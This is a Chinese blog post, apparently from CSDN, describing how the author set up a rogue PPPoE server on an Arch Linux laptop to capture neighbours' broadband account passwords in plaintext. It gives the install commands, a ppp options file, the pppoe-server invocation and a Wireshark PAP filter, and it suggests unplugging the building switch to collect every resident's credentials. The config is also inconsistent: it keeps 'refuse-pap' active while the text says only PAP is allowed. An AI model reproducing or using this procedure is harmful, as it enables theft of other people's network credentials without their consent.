linux查看pppoe接口,linux下截获pppoe密码

最近发现楼下交换机竟然没有任何防护,直挺挺的放电表箱里吃灰,正巧今天周五不上班,看看怎么把大家的pppoe帐号密码拿过来。

小区每个单元都有一个小交换机,各户的客户端的pppoe拨号就是通过它链接到总交换机(名词对不对?)的。我的思路就是用我的笔记本电脑作为pppoe-server,欺骗其他客户端来我这里验证,通过抓包获取pppoe帐号和密码。新瓶装老酒而已,但是我百度了一圈,没有找到linux下的操作方式,基本都是windows。

本子装的ArchLinux,先安装pppoe-server 及wireshark抓包工具,wireshark有gtk和qt两个gui,我用的是gtk 的

root> pacman -S ppp rp-pppoe

root>pacman -S wireshark-gtk wireshark-common

安装完后,做如下配置:(refuse是验证协议,只保留了pap,密码是明文验证)

# /etc/ppp/options

auth

local

login

defaultroute

hide-password

ipcp-accept-local

ipcp-accept-remote

lcp-echo-failure 2

lcp-echo-interval 10

refuse-pap

#refuse-chap

#refuse-mschap

#require-mschap-v2

ms-dns 202.106.0.20

noproxyarp

be0fa7ceea78

配置完成后执行以下命令

#查看网卡接口名 就是一般linux里的eth0 eth0之类的,网口名。使用ifconfig也可获取到,我的wlp3s0是有线网卡,wlp3s0是无线网卡。

root>ip link

be0fa7ceea78

root>pppoe-server -I enp0s25 -L 10.0.0.1 -R 10.0.0.10 -C tech -S pppoe1 -N 100 -T 60

除了 -I 参数,其他参数不用修改。

参数说明:

-I  指定网口名

-L pppoe服务器地址,据说可以任意

-R 客户端起始ip

-C  指定服务名 据说可随意

-N 客户端最大连接数

-T 超时时间,单位是秒

接下来打开wireshark

选中enp0s25网卡点击Start

be0fa7ceea78

添加Filter : pap.data ,然后点击 Apply 。不添加的话数据可能太多。

be0fa7ceea78

pppoe服务端及嗅探工具就算配置好了,接下来我把我的路由wan口插到笔记本上。稍等片刻就得到了明文密码,下图可以看出客户端尝试多种验证协议链接pppoe-server 。因为没有配置/etc/ppp/chap-secrets,所以会一直校验失败。

be0fa7ceea78

再然后,我只能说理论上,将单元楼交换机总线拔掉,然后用网线插到笔记本网口,稍等片刻整栋楼的pppoe密码就都到手了。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值